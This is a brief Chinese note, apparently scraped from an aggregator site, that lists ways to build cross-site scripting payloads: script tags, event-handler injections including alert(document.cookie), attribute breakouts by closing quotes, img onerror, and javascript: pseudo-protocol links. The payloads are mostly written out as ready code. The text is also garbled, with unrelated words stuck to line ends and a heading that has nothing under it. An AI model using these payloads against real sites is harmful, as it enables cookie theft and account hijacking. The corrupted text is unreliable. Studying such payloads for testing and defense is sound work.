xss的構造方式

xss的構造方式:javascript

一,尖括號構造 <script>alert(1)</script>java

二,事件構造 "onmouseover="alert(1)cookie

"onfocus="alert(document.cookie)xss

例如:已知輸入點,首先先閉合雙引號,則構造以下語句spa

」 onmouseover="alert(1)" type="textblog

<img src="x" onerror="alert(1)">//屬性須要加雙引號seo

變形以後:事件

 三,構造僞協議ip

<a href=javascript:alert(1)>click on!</a>cli

相關文章
相關標籤/搜索